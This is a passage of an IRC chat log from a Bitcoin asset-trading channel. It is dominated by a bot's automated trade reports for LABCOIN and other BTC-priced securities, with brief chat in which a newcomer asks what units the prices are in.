[BTCTC] [LABCOIN] 10400 @ 0.003 = 31.2 BTC [-] Sep 14 04:05:03 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [-] Sep 14 04:05:04 [BTCTC] [LABCOIN] 407 @ 0.003 = 1.221 BTC [-] Sep 14 04:05:05 [BTCTC] [LABCOIN] 6000 @ 0.003 = 18 BTC [-] Sep 14 04:05:06 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [-] Sep 14 04:05:07 [BTCTC] [LABCOIN] 500 @ 0.003 = 1.5 BTC [-] Sep 14 04:05:08 [BTCTC] [LABCOIN] 95 @ 0.003 = 0.285 BTC [-] Sep 14 04:05:27 BOOM Sep 14 04:05:33 [BTCTC] [ACTIVEMINING] 2 @ 0.002819 = 0.0056 BTC [-] Sep 14 04:05:34 [BTCTC] [LABCOIN] 96 @ 0.003 = 0.288 BTC [-] Sep 14 04:05:34 [BTCTC] [ACTIVEMINING] 10 @ 0.002818 = 0.0282 BTC [-] Sep 14 04:05:36 [BTCTC] [ACTIVEMINING] 133 @ 0.002812 = 0.374 BTC [-] Sep 14 04:05:37 [BTCTC] [ACTIVEMINING] 18 @ 0.002809 = 0.0506 BTC [-] Sep 14 04:05:38 [BTCTC] [LABCOIN] 6950 @ 0.002956 = 20.5442 BTC [-] Sep 14 04:05:39 [BTCTC] [ACTIVEMINING] 137 @ 0.0028 = 0.3836 BTC [-] Sep 14 04:05:40 [BTCTC] [LABCOIN] 407 @ 0.002915 = 1.1864 BTC [-] Sep 14 04:05:42 [BTCTC] [LABCOIN] 1500 @ 0.002913 = 4.3695 BTC [-] Sep 14 04:05:43 [BTCTC] [LABCOIN] 40 @ 0.002904 = 0.1162 BTC [-] Sep 14 04:05:44 [BTCTC] [LABCOIN] 11103 @ 0.002903 = 32.232 BTC [-] Sep 14 04:05:45 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Sep 14 04:05:53 [BTCTC] [LABCOIN] 500 @ 0.002997 = 1.4985 BTC [-] Sep 14 04:05:56 [BTCTC] [LABCOIN] 3897 @ 0.002903 = 11.313 BTC [-] Sep 14 04:05:57 [BTCTC] [LABCOIN] 100 @ 0.002902 = 0.2902 BTC [-] Sep 14 04:05:59 [BTCTC] [LABCOIN] 4470 @ 0.0029 = 12.963 BTC [-] Sep 14 04:06:00 [BTCTC] [LABCOIN] 500 @ 0.00289 = 1.445 BTC [-] Sep 14 04:06:01 [BTCTC] [LABCOIN] 400 @ 0.002887 = 1.1548 BTC [-] Sep 14 04:06:02 [BTCTC] [LABCOIN] 200 @ 0.002887 = 0.5774 BTC [-] Sep 14 04:06:03 [BTCTC] [LABCOIN] 2000 @ 0.002886 = 5.772 BTC [-] Sep 14 04:06:03 BRING BACK THE CONCORDE Sep 14 04:06:04 [BTCTC] [LABCOIN] 1 @ 0.002838 BTC [-] Sep 14 04:06:05 [BTCTC] [LABCOIN] 200 @ 0.002832 = 0.5664 BTC [-] Sep 14 04:06:06 [BTCTC] [LABCOIN] 529 @ 0.002826 = 1.495 BTC [-] Sep 14 04:06:06 [BTCTC] [LABCOIN] 35 @ 0.002812 = 0.0984 BTC [-] Sep 14 04:06:07 [BTCTC] [LABCOIN] 280 @ 0.002805 = 0.7854 BTC [-] Sep 14 04:06:08 [BTCTC] [LABCOIN] 2000 @ 0.002803 = 5.606 BTC [-] Sep 14 04:06:10 [BTCTC] [LABCOIN] 2000 @ 0.002801 = 5.602 BTC [-] Sep 14 04:06:11 [BTCTC] [LABCOIN] 100 @ 0.0028 = 0.28 BTC [-] Sep 14 04:06:12 [BTCTC] [LABCOIN] 325 @ 0.0028 = 0.91 BTC [-] Sep 14 04:06:13 [BTCTC] [LABCOIN] 3000 @ 0.0028 = 8.4 BTC [-] Sep 14 04:06:14 [BTCTC] [LABCOIN] 3 @ 0.0028 = 0.0084 BTC [-] Sep 14 04:06:16 [BTCTC] [LABCOIN] 99 @ 0.0028 = 0.2772 BTC [-] Sep 14 04:06:16 [BTCTC] [LABCOIN] 300 @ 0.0028 = 0.84 BTC [-] Sep 14 04:06:17 [BTCTC] [LABCOIN] 500 @ 0.0028 = 1.4 BTC [-] Sep 14 04:06:19 [BTCTC] [LABCOIN] 1000 @ 0.0028 = 2.8 BTC [-] Sep 14 04:06:21 [BTCTC] [LABCOIN] 100 @ 0.0028 = 0.28 BTC [-] Sep 14 04:06:25 [BTCTC] [LABCOIN] 193 @ 0.0028 = 0.5404 BTC [-] Sep 14 04:06:27 [BTCTC] [LABCOIN] 200 @ 0.00277 = 0.554 BTC [-] Sep 14 04:06:27 Duffer1: you still around? Sep 14 04:06:28 [BTCTC] [LABCOIN] 50 @ 0.00273 = 0.1365 BTC [-] Sep 14 04:06:29 [BTCTC] [LABCOIN] 663 @ 0.00273 = 1.81 BTC [-] Sep 14 04:06:31 [BTCTC] [LABCOIN] 768 @ 0.0028 = 2.1504 BTC [+] Sep 14 04:06:33 [BTCTC] [LABCOIN] 810 @ 0.002956 = 2.3944 BTC [+] Sep 14 04:06:34 [BTCTC] [LABCOIN] 1500 @ 0.002997 = 4.4955 BTC [+] Sep 14 04:06:34 [BTCTC] [LABCOIN] 424 @ 0.002998 = 1.2712 BTC [+] Sep 14 04:06:35 [BTCTC] [LABCOIN] 7778 @ 0.003 = 23.334 BTC [+] Sep 14 04:06:36 [BTCTC] [LABCOIN] 500 @ 0.003 = 1.5 BTC [+] Sep 14 04:06:38 [BTCTC] [LABCOIN] 97 @ 0.003015 = 0.2925 BTC [+] Sep 14 04:06:39 [BTCTC] [LABCOIN] 96 @ 0.00297 = 0.2851 BTC [-] Sep 14 04:06:40 [BTCTC] [LABCOIN] 97 @ 0.003038 = 0.2947 BTC [+] Sep 14 04:06:41 [BTCTC] [LABCOIN] 568 @ 0.003284 = 1.8653 BTC [+] Sep 14 04:06:42 [BTCTC] [LABCOIN] 99 @ 0.003062 = 0.3031 BTC [-] Sep 14 04:06:43 [BTCTC] [LABCOIN] 1 @ 0.003547 BTC [+] Sep 14 04:06:44 [BTCTC] [LABCOIN] 1000 @ 0.003548 = 3.548 BTC [+] Sep 14 04:06:44 [BTCTC] [LABCOIN] 1999 @ 0.003549 = 7.0945 BTC [+] Sep 14 04:06:45 [BTCTC] [LABCOIN] 50 @ 0.00355 = 0.1775 BTC [+] Sep 14 04:06:46 [BTCTC] [LABCOIN] 1280 @ 0.00355 = 4.544 BTC [+] Sep 14 04:06:47 [BTCTC] [LABCOIN] 96 @ 0.002992 = 0.2872 BTC [-] Sep 14 04:06:48 [BTCTC] [LABCOIN] 1000 @ 0.003551 = 3.551 BTC [+] Sep 14 04:06:49 [BTCTC] [LABCOIN] 200 @ 0.003553 = 0.7106 BTC [+] Sep 14 04:06:50 [BTCTC] [LABCOIN] 1000 @ 0.00356 = 3.56 BTC [+] Sep 14 04:06:51 [BTCTC] [LABCOIN] 260 @ 0.003571 = 0.9285 BTC [+] Sep 14 04:06:52 [BTCTC] [LABCOIN] 377 @ 0.003572 = 1.3466 BTC [+] Sep 14 04:06:53 [BTCTC] [LABCOIN] 99 @ 0.002975 = 0.2945 BTC [-] Sep 14 04:06:54 [BTCTC] [LABCOIN] 401 @ 0.002975 = 1.193 BTC [-] Sep 14 04:06:54 [BTCTC] [LABCOIN] 926 @ 0.00273 = 2.528 BTC [-] Sep 14 04:07:01 [BTCTC] [LABCOIN] 810 @ 0.002956 = 2.3944 BTC [+] Sep 14 04:07:02 [BTCTC] [LABCOIN] 69 @ 0.002745 = 0.1894 BTC [-] Sep 14 04:07:04 [BTCTC] [LABCOIN] 411 @ 0.00273 = 1.122 BTC [-] Sep 14 04:07:05 [BTCTC] [LABCOIN] 1670 @ 0.00272 = 4.5424 BTC [-] Sep 14 04:07:06 [BTCTC] [LABCOIN] 50 @ 0.002711 = 0.1356 BTC [-] Sep 14 04:07:07 [BTCTC] [LABCOIN] 4440 @ 0.00271 = 12.0324 BTC [-] Sep 14 04:07:14 labcoin news not good or something Sep 14 04:07:17 [BTCTC] [LABCOIN] 136 @ 0.002802 = 0.3811 BTC [+] Sep 14 04:07:19 [BTCTC] [LABCOIN] 2675 @ 0.0028 = 7.49 BTC [-] Sep 14 04:07:23 haha who is trying to pump Sep 14 04:07:33 [BTCTC] [LABCOIN] 220 @ 0.002802 = 0.6164 BTC [+] Sep 14 04:07:35 [BTCTC] [LABCOIN] 1930 @ 0.002801 = 5.4059 BTC [-] Sep 14 04:07:36 [BTCTC] [LABCOIN] 97 @ 0.00289 = 0.2803 BTC [+] Sep 14 04:07:45 [BTCTC] [LABCOIN] 97 @ 0.002862 = 0.2776 BTC [-] Sep 14 04:07:59 [BTCTC] [LABCOIN] 2 @ 0.00289 = 0.0058 BTC [+] Sep 14 04:08:00 [BTCTC] [LABCOIN] 98 @ 0.00289 = 0.2832 BTC [+] Sep 14 04:08:08 [BTCTC] [LABCOIN] 1 @ 0.00289 BTC [+] Sep 14 04:08:10 [BTCTC] [LABCOIN] 95 @ 0.002812 = 0.2671 BTC [-] Sep 14 04:08:24 [BTCTC] [LABCOIN] 98 @ 0.002812 = 0.2756 BTC [-] Sep 14 04:08:33 coconut did you see teh calc? Sep 14 04:08:34 [BTCTC] [LABCOIN] 97 @ 0.0029 = 0.2813 BTC [+] Sep 14 04:08:47 [BTCTC] [LABCOIN] 120 @ 0.003298 = 0.3958 BTC [+] Sep 14 04:08:50 [BTCTC] [LABCOIN] 99 @ 0.002902 = 0.2873 BTC [-] Sep 14 04:08:53 [BTCTC] [LABCOIN] 81 @ 0.002902 = 0.2351 BTC [-] Sep 14 04:08:55 [BTCTC] [LABCOIN] 903 @ 0.0029 = 2.6187 BTC [-] Sep 14 04:08:56 [BTCTC] [LABCOIN] 5 @ 0.002891 = 0.0145 BTC [-] Sep 14 04:08:58 [BTCTC] [LABCOIN] 1 @ 0.002813 BTC [-] Sep 14 04:08:59 [BTCTC] [LABCOIN] 150 @ 0.002813 = 0.422 BTC [-] Sep 14 04:09:00 [BTCTC] [LABCOIN] 95 @ 0.002813 = 0.2672 BTC [-] Sep 14 04:09:01 [BTCTC] [LABCOIN] 600 @ 0.00281 = 1.686 BTC [-] Sep 14 04:09:02 [BTCTC] [LABCOIN] 500 @ 0.002806 = 1.403 BTC [-] Sep 14 04:09:04 [BTCTC] [LABCOIN] 7165 @ 0.002806 = 20.105 BTC [-] Sep 14 04:09:08 lol Sep 14 04:09:11 is he playing games? Sep 14 04:09:19 "it will be OVER 100,000 chips" Sep 14 04:09:27 [BTCTC] [LABCOIN] 4 @ 0.003253 = 0.013 BTC [+] Sep 14 04:10:08 [BTCTC] [ACTIVEMINING] 4 @ 0.002934 = 0.0117 BTC [+] Sep 14 04:10:40 :D Sep 14 04:11:03 [BTCTC] [LABCOIN] 39 @ 0.003248 = 0.1267 BTC [-] Sep 14 04:12:02 [BTCTC] [LABCOIN] 130 @ 0.00292 = 0.3796 BTC [-] Sep 14 04:12:14 [BTCTC] [LABCOIN] 1870 @ 0.00292 = 5.4604 BTC [-] Sep 14 04:12:29 Hello? Got message meet MP here? Sep 14 04:12:32 [BTCTC] [LABCOIN] 190 @ 0.002918 = 0.5544 BTC [-] Sep 14 04:12:35 [BTCTC] [LABCOIN] 130 @ 0.00292 = 0.3796 BTC [+] Sep 14 04:12:44 [BTCTC] [LABCOIN] 130 @ 0.00292 = 0.3796 BTC [+] Sep 14 04:12:45 [BTCTC] [LABCOIN] 130 @ 0.002916 = 0.3791 BTC [-] Sep 14 04:12:47 [BTCTC] [LABCOIN] 1300 @ 0.002915 = 3.7895 BTC [-] Sep 14 04:12:48 [BTCTC] [LABCOIN] 900 @ 0.002912 = 2.6208 BTC [-] Sep 14 04:12:56 Thanks. Found right place then. Sep 14 04:13:00 [BTCTC] [LABCOIN] 50 @ 0.002911 = 0.1456 BTC [-] Sep 14 04:13:03 [BTCTC] [LABCOIN] 2050 @ 0.002911 = 5.9676 BTC [-] Sep 14 04:13:05 [BTCTC] [LABCOIN] 130 @ 0.002911 = 0.3784 BTC [-] Sep 14 04:13:07 [BTCTC] [LABCOIN] 860 @ 0.002911 = 2.5035 BTC [-] Sep 14 04:13:14 [HAVELOCK] [XBOND] 800 @ 0.001186 = 0.9488 BTC [-] Sep 14 04:13:21 What is assbot doing? Sep 14 04:13:34 [BTCTC] [LABCOIN] 138 @ 0.00292 = 0.403 BTC [+] Sep 14 04:13:36 [BTCTC] [LABCOIN] 3042 @ 0.00292 = 8.8826 BTC [+] Sep 14 04:14:05 Ah. Noisy. I guess if folk like. What units of exchange? Sep 14 04:14:07 [BTCTC] [ACTIVEMINING] 117 @ 0.002803 = 0.328 BTC [-] Sep 14 04:14:09 [BTCTC] [ACTIVEMINING] 4 @ 0.002802 = 0.0112 BTC [-] Sep 14 04:14:10 [BTCTC] [ACTIVEMINING] 10 @ 0.002801 = 0.028 BTC [-] Sep 14 04:14:11 [BTCTC] [ACTIVEMINING] 363 @ 0.0028 = 1.0164 BTC [-] Sep 14 04:14:13 [BTCTC] [ACTIVEMINING] 100 @ 0.002791 = 0.2791 BTC [-] Sep 14 04:14:14 [BTCTC] [ACTIVEMINING] 500 @ 0.002791 = 1.3955 BTC [-] Sep 14 04:14:14 [BTCTC] [ACTIVEMINING] 906 @ 0.00279 = 2.5277 BTC [-] Sep 14 04:15:26 MP is also blessed with girlfriends? Happy man. Usually. Sep 14 04:15:51 [BTCTC] [LABCOIN] 108 @ 0.003002 = 0.3242 BTC [+] Sep 14 04:15:53 [BTCTC] [LABCOIN] 450 @ 0.003 = 1.35 BTC [-] Sep 14 04:15:54 [BTCTC] [LABCOIN] 100 @ 0.002931 = 0.2931 BTC [-] Sep 14 04:15:55 [BTCTC] [LABCOIN] 1000 @ 0.00293 = 2.93 BTC [-] Sep 14 04:15:57 [BTCTC] [LABCOIN] 870 @ 0.002922 = 2.5421 BTC [-] Sep 14 04:15:58 [BTCTC] [LABCOIN] 12000 @ 0.002921 = 35.052 BTC [-] Sep 14 04:15:59 [BTCTC] [LABCOIN] 1958 @ 0.00292 = 5.7174 BTC [-] Sep 14 04:16:00 [BTCTC] [LABCOIN] 2230 @ 0.002911 = 6.4915 BTC [-] Sep 14 04:16:01 [BTCTC] [LABCOIN] 3000 @ 0.002911 = 8.733 BTC [-] Sep 14 04:16:02 [BTCTC] [LABCOIN] 3284 @ 0.002901 = 9.5269 BTC [-] Sep 14 04:16:42 Is price assbot reports in oz. gold? Sep 14 04:16:45 [BTCTC] [LABCOIN] 6 @ 0.003156 = 0.0189 BTC [+] Sep 14 04:16:45 [BTCTC] [LABCOIN] 5 @ 0.003157 = 0.0158 BTC [+] Sep 14 04:16:46 [BTCTC] [LABCOIN] 1 @ 0.003158 BTC [+] Sep 14 04:16:48 [BTCTC] [LABCOIN] 667 @ 0.003195 = 2.1311 BTC [+] Sep 14 04:16:49 [BTCTC] [LABCOIN] 727 @ 0.003197 = 2.3242 BTC [+] Sep 14 04:16:50 [BTCTC] [LABCOIN] 75 @ 0.0032 = 0.24 BTC [+] Sep 14 04:16:51 [BTCTC] [LABCOIN] 500 @ 0.0032 = 1.6 BTC [+] Sep 14 04:16:52 [BTCTC] [LABCOIN] 194 @ 0.003222 = 0.6251 BTC [+] Sep 14 04:16:53 [BTCTC] [LABCOIN] 97 @ 0.003223 = 0.3126 BTC [+] Sep 14 04:16:54 [BTCTC] [LABCOIN] 1000 @ 0.003238 = 3.238 BTC [+] Sep 14 04:16:55 [BTCTC] [LABCOIN] 500 @ 0.003239 = 1.6195 BTC [+] Sep 14 04:16:55 [BTCTC] [LABCOIN] 99 @ 0.003248 = 0.3216 BTC [+] Sep 14 04:16:56 [BTCTC] [LABCOIN] 100 @ 0.003272 = 0.3272 BTC [+] Sep 14 04:16:57 [BTCTC] [LABCOIN] 100 @ 0.003273 = 0.3273 BTC [+] Sep 14 04:16:58 [BTCTC] [LABCOIN] 96 @ 0.003298 = 0.3166 BTC [+] Sep 14 04:17:00 [BTCTC] [LABCOIN] 150 @ 0.0033 = 0.495 BTC [+] Sep 14 04:17:01 [BTCTC] [LABCOIN] 97 @ 0.003324 = 0.3224 BTC [+] Sep 14 04:17:02 [BTCTC] [LABCOIN] 98 @ 0.00335 = 0.3283 BTC [+] Sep 14 04:17:03 [BTCTC] [LABCOIN] 96 @ 0.003376 = 0.3241 BTC [+] Sep 14 04:17:04 [BTCTC] [LABCOIN] 96 @ 0.003402 = 0.3266 BTC [+] Sep 14 04:17:05 [BTCTC] [LABCOIN] 1296 @ 0.003423 = 4.4362 BTC [+] Sep 14 04:17:06 [BTCTC] [LABCOIN] 95 @ 0.002862 = 0.2719 BTC [-] Sep 14 04:17:07 [BTCTC] [LABCOIN] 905 @ 0.00286 = 2.5883 BTC [-] Sep 14 04:17:21 [BTCTC] [LABCOIN] 95 @ 0.002907 = 0.2762 BTC [+] Sep 14 04:17:23 [BTCTC] [LABCOIN] 95 @ 0.00286 = 0.2717 BTC [-] Sep 14 04:17:24 [BTCTC] [LABCOIN] 98 @ 0.002856 = 0.2799 BTC [-] Sep 14 04:17:25 [BTCTC] [LABCOIN] 97 @ 0.002834 = 0.2749 BTC [-] Sep 14 04:17:27 [BTCTC] [LABCOIN] 100 @ 0.002812 = 0.2812 BTC [-] Sep 14 04:17:28 [BTCTC] [LABCOIN] 100 @ 0.002812 = 0.2812 BTC [-] Sep 14 04:17:29 [BTCTC] [LABCOIN] 1000 @ 0.002811 = 2.811 BTC [-] Sep 14 04:17:30 [BTCTC] [LABCOIN] 915 @ 0.002807 = 2.5684 BTC [-] Sep 14 04:18:09 [BTCTC] [LABCOIN] 249 @ 0.002912 = 0.7251 BTC [+] Sep 14 04:18:10 [BTCTC] [LABCOIN] 240 @ 0.002911 = 0.6986 BTC [-] Sep 14 04:18:11 [BTCTC] [LABCOIN] 1900 @ 0.00291 = 5.529 BTC [-] Sep 14 04:18:12 [BTCTC] [LABCOIN] 251 @ 0.002908 = 0.7299 BTC [-] Sep 14 04:20:02 [BTCTC] [LABCOIN] 205 @ 0.002914 = 0.5974 BTC [+] Sep 14 04:20:04 [BTCTC] [LABCOIN] 100 @ 0.002914 = 0.2914 BTC [+] Sep 14 04:20:05 [BTCTC] [LABCOIN] 2000 @ 0.002912 = 5.824 BTC [-] Sep 14 04:20:06 [BTCTC] [LABCOIN] 249 @ 0.002908 = 0.7241 BTC [-] Sep 14 04:20:08 [BTCTC] [LABCOIN] 98 @ 0.002904 = 0.2846 BTC [-] Sep 14 04:20:09 [BTCTC] [LABCOIN] 100 @ 0.0029 = 0.29 BTC [-] Sep 14 04:20:10 [BTCTC] [LABCOIN] 9 @ 0.002882 = 0.0259 BTC [-] Sep 14 04:20:10 [BTCTC] [LABCOIN] 99 @ 0.002881 = 0.2852 BTC [-] Sep 14 04:20:11 [BTCTC] [LABCOIN] 158 @ 0.00286 = 0.4519 BTC [-] Sep 14 04:20:13 [BTCTC] [LABCOIN] 1488 @ 0.002859 = 4.2542 BTC [-] Sep 14 04:20:14 [BTCTC] [LABCOIN] 99 @ 0.002858 = 0.2829 BTC [-] Sep 14 04:20:15 [BTCTC] [LABCOIN] 500 @ 0.002851 = 1.4255 BTC [-] Sep 14 04:20:16 [BTCTC] [LABCOIN] 4895 @ 0.00285 = 13.9508 BTC [-] Sep 14 04:20:25 [BTCTC] [LABCOIN] 500 @ 0.002914 = 1.457 BTC [+] Sep 14 04:20:26 [BTCTC] [LABCOIN] 313 @ 0.002999 = 0.9387 BTC [+] Sep 14 04:20:27 [BTCTC] [LABCOIN] 487 @ 0.003 = 1.461 BTC [+] Sep 14 04:20:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.197 BTC [-] Sep 14 04:20:30 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1969 = 0.7876 BTC [-] Sep 14 04:20:43 [BTCTC] [LABCOIN] 5 @ 0.002915 = 0.0146 BTC [-] Sep 14 04:20:44 [BTCTC] [LABCOIN] 200 @ 0.0029 = 0.58 BTC [-] Sep 14 04:20:45 [BTCTC] [LABCOIN] 105 @ 0.00285 = 0.2993 BTC [-] Sep 14 04:20:46 [BTCTC] [LABCOIN] 9 @ 0.002836 = 0.0255 BTC [-] Sep 14 04:20:48 [BTCTC] [LABCOIN] 98 @ 0.002835 = 0.2778 BTC [-] Sep 14 04:20:49 [BTCTC] [LABCOIN] 9 @ 0.002813 = 0.0253 BTC [-] Sep 14 04:20:50 [BTCTC] [LABCOIN] 96 @ 0.002812 = 0.27 BTC [-] Sep 14 04:20:51 [BTCTC] [LABCOIN] 50 @ 0.00281 = 0.1405 BTC [-] Sep 14 04:20:52 [BTCTC] [LABCOIN] 295 @ 0.002809 = 0.8287 BTC [-] Sep 14 04:20:58 [BTCTC] [LABCOIN] 177 @ 0.00285 = 0.5045 BTC [+] Sep 14 04:21:13 [BTCTC] [LABCOIN] 18 @ 0.00285 = 0.0513 BTC [+] Sep 14 04:21:21 Can't be gold oz, wrong by factor of 3. could be gold 10 grams? Sep 14 04:21:51 [BTCTC] [LABCOIN] 28 @ 0.002812 = 0.0787 BTC [-] Sep 14 04:21:53 [BTCTC] [LABCOIN] 75 @ 0.002811 = 0.2108 BTC [-] Sep 14 04:21:54 [BTCTC] [LABCOIN] 205 @ 0.002809 = 0.5758 BTC [-] Sep 14 04:21:55 [BTCTC] [LABCOIN] 252 @ 0.002808 = 0.7076 BTC [-] Sep 14 04:22:49 [BTCTC] [ASICMINER-PT] 2 @ 2.182 = 4.364 BTC [+] Sep 14 04:22:50 [BTCTC] [ASICMINER-PT] 3 @ 2.183 = 6.549 BTC [+] Sep 14 04:23:04 can't be dollars per bitcoin, wrong by factor of 2. Sep 14 04:24:25 [BTCTC] [DMS.SELLING] 4 @ 0.0094 = 0.0376 BTC [-] Sep 14 04:24:34 [BTCTC] [LABCOIN] 950 @ 0.002811 = 2.6705 BTC [+] Sep 14 04:24:35 [BTCTC] [LABCOIN] 9000 @ 0.00281 = 25.29 BTC [-] Sep 14 04:24:42 Hai. Sep 14 04:24:57 [BTCTC] [LABCOIN] 500 @ 0.002809 = 1.4045 BTC [-] Sep 14 04:25:00 [BTCTC] [LABCOIN] 35 @ 0.002808 = 0.0983 BTC [-] Sep 14 04:25:01 [BTCTC] [LABCOIN] 569 @ 0.002807 = 1.5972 BTC [-] Sep 14 04:25:04 Got that. See volumes. Trying to figure out what units is price. Sep 14 04:25:16 [BTCTC] [LABCOIN] 16 @ 0.002807 = 0.0449 BTC [-] Sep 14 04:25:17 [BTCTC] [LABCOIN] 27 @ 0.002807 = 0.0758 BTC [-] Sep 14 04:25:19 [BTCTC] [LABCOIN] 3834 @ 0.002806 = 10.7582 BTC [-] Sep 14 04:25:28 Shares of what company? Sep 14 04:25:32 [BTCTC] [LABCOIN] 453 @ 0.002806 = 1.2711 BTC [-] Sep 14 04:25:33 [BTCTC] [LABCOIN] 2197 @ 0.002803 = 6.1582 BTC [-] Sep 14 04:25:46 [BTCTC] [ASICMINER-PT] 1 @ 2.222 BTC [+] Sep 14 04:25:47 [BTCTC] [ASICMINER-PT] 2 @ 2.238 = 4.476 BTC [+] Sep 14 04:25:48 [BTCTC] [LABCOIN] 400 @ 0.002803 = 1.1212 BTC [-] Sep 14 04:25:49 [BTCTC] [ASICMINER-PT] 1 @ 2.24 BTC [+] Sep 14 04:25:51 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [+] Sep 14 04:26:07 [MPEX] [S.MPOE] 1300 @ 0.00089853 = 1.1681 BTC [-] Sep 14 04:26:12 [BTCTC] [LABCOIN] 2203 @ 0.002803 = 6.175 BTC [-] Sep 14 04:26:14 [BTCTC] [LABCOIN] 25 @ 0.002802 = 0.0701 BTC [-] Sep 14 04:26:15 Ah. Thought it was reporting money trades for bitcoin. Is reporting instead stock trades for bitcoin? Sep 14 04:26:15 [BTCTC] [LABCOIN] 5567 @ 0.002802 = 15.5987 BTC [-] Sep 14 04:26:16 [MPEX] [S.MPOE] 3200 @ 0.00089725 = 2.8712 BTC [-] Sep 14 04:26:28 [BTCTC] [LABCOIN] 200 @ 0.002803 = 0.5606 BTC [+] Sep 14 04:26:41 [BTCTC] [LABCOIN] 3050 @ 0.002802 = 8.5461 BTC [-] Sep 14 04:26:45 [BTCTC] [LABCOIN] 500 @ 0.002802 = 1.401 BTC [-] Sep 14 04:26:58 yes, stocks, bonds, what have you Sep 14 04:27:25 [BTCTC] [LABCOIN] 300 @ 0.002803 = 0.8409 BTC [+] Sep 14 04:27:27 the syntax is [exchange] [asset] ammt @ price = total [movement] Sep 14 04:27:38 [BTCTC] [ASICMINER-PT] 1 @ 2.167 BTC [-] Sep 14 04:27:39 [BTCTC] [ASICMINER-PT] 2 @ 2.166 = 4.332 BTC [-] Sep 14 04:27:40 [BTCTC] [ASICMINER-PT] 3 @ 2.165 = 6.495 BTC [-] Sep 14 04:27:41 [BTCTC] [LABCOIN] 500 @ 0.002805 = 1.4025 BTC [+] Sep 14 04:27:42 [BTCTC] [ASICMINER-PT] 5 @ 2.165 = 10.825 BTC [-] Sep 14 04:27:45 [BTCTC] [LABCOIN] 470 @ 0.002802 = 1.3169 BTC [-] Sep 14 04:27:46 Interesting. Good application. Exchanges have uniform API, yes? Sep 14 04:28:12 [BTCTC] [LABCOIN] 100 @ 0.0028 = 0.28 BTC [-] Sep 14 04:28:15 [BTCTC] [LABCOIN] 100 @ 0.0028 = 0.28 BTC [-] Sep 14 04:28:16 [BTCTC] [LABCOIN] 250 @ 0.0028 = 0.7 BTC [-] Sep 14 04:28:17 assbot has uniform api to which exchanges oblige Sep 14 04:28:20 :> Sep 14 04:28:36 Heh. Nice of them. Sep 14 04:28:50 [BTCTC] [LABCOIN] 578 @ 0.00275 = 1.5895 BTC [-] Sep 14 04:28:52 [BTCTC] [LABCOIN] 500 @ 0.002707 = 1.3535 BTC [-] Sep 14 04:28:53 [BTCTC] [LABCOIN] 2623 @ 0.002706 = 7.0978 BTC [-] Sep 14 04:29:16 [BTCTC] [LABCOIN] 1000 @ 0.002706 = 2.706 BTC [-] Sep 14 04:29:17 Bet this implies that long list of names over on side is all just software listen to ticker, maybe even autotrade. Sep 14 04:29:27 [BTCTC] [LABCOIN] 5075 @ 0.002706 = 13.733 BTC [-] Sep 14 04:29:46 thestringpuller i'm around wassup? Sep 14 04:29:47 [BTCTC] [LABCOIN] 136 @ 0.002705 = 0.3679 BTC [-] Sep 14 04:30:03 [BTCTC] [LABCOIN] 100 @ 0.0027 = 0.27 BTC [-] Sep 14 04:30:14 Edward__ a few bots, i think less than 5 Sep 14 04:30:15 Got message meet MP here. Not seen yet. Sep 14 04:30:21 Edward__ theres another chan for this Sep 14 04:30:28 #bitcoin-assets-trades Sep 14 04:30:29 [BTCTC] [LABCOIN] 1000 @ 0.002675 = 2.675 BTC [-] Sep 14 04:30:34 is trades only, better for bots Sep 14 04:30:40 [BTCTC] [LABCOIN] 1000 @ 0.00267 = 2.67 BTC [-] Sep 14 04:30:42 [BTCTC] [LABCOIN] 1000 @ 0.002668 = 2.668 BTC [-] Sep 14 04:30:43 [BTCTC] [LABCOIN] 1619 @ 0.002628 = 4.2547 BTC [-] Sep 14 04:30:48 [BTCTC] [LABCOIN] 200 @ 0.002627 = 0.5254 BTC [-] Sep 14 04:30:51 [BTCTC] [LABCOIN] 100 @ 0.002607 = 0.2607 BTC [-] Sep 14 04:30:53 [BTCTC] [LABCOIN] 1 @ 0.002607 BTC [-] Sep 14 04:31:21 Edward__ he will be around sooner or later Sep 14 04:31:22 [BTCTC] [LABCOIN] 199 @ 0.002607 = 0.5188 BTC [-] Sep 14 04:31:24 [BTCTC] [LABCOIN] 2000 @ 0.002601 = 5.202 BTC [-] Sep 14 04:31:36 [BTCTC] [LABCOIN] 78 @ 0.002586 = 0.2017 BTC [-] Sep 14 04:31:39 [BTCTC] [LABCOIN] 500 @ 0.002585 = 1.2925 BTC [-] Sep 14 04:31:41 [BTCTC] [LABCOIN] 3422 @ 0.002583 = 8.839 BTC [-] Sep 14 04:31:43 [BTCTC] [LABCOIN] 1708 @ 0.002583 = 4.4118 BTC [-] Sep 14 04:31:52 [BTCTC] [LABCOIN] 78 @ 0.002599 = 0.2027 BTC [+] Sep 14 04:32:10 [BTCTC] [LABCOIN] 2000 @ 0.002586 = 5.172 BTC [-] Sep 14 04:32:11 [BTCTC] [LABCOIN] 3000 @ 0.002583 = 7.749 BTC [-] Sep 14 04:32:14 [BTCTC] [LABCOIN] 1870 @ 0.002583 = 4.8302 BTC [-] Sep 14 04:32:15 [BTCTC] [LABCOIN] 14 @ 0.00257 = 0.036 BTC [-] Sep 14 04:32:16 [BTCTC] [LABCOIN] 1500 @ 0.00256 = 3.84 BTC [-] Sep 14 04:32:17 [BTCTC] [LABCOIN] 20 @ 0.00255 = 0.051 BTC [-] Sep 14 04:32:18 [BTCTC] [LABCOIN] 1500 @ 0.00255 = 3.825 BTC [-] Sep 14 04:32:19 [BTCTC] [LABCOIN] 13 @ 0.00255 = 0.0332 BTC [-] Sep 14 04:32:40 [BTCTC] [LABCOIN] 243 @ 0.002543 = 0.6179 BTC [-] Sep 14 04:32:56 [BTCTC] [LABCOIN] 319 @ 0.002543 = 0.8112 BTC [-] Sep 14 04:32:57 [BTCTC] [LABCOIN] 300 @ 0.00252 = 0.756 BTC [-] Sep 14 04:32:59 [BTCTC] [LABCOIN] 125 @ 0.00252 = 0.315 BTC [-] Sep 14 04:33:01 [BTCTC] [LABCOIN] 500 @ 0.002515 = 1.2575 BTC [-] Sep 14 04:33:02 [BTCTC] [LABCOIN] 2000 @ 0.002515 = 5.03 BTC [-] Sep 14 04:33:04 [BTCTC] [LABCOIN] 500 @ 0.002514 = 1.257 BTC [-] Sep 14 04:33:05 [BTCTC] [LABCOIN] 5000 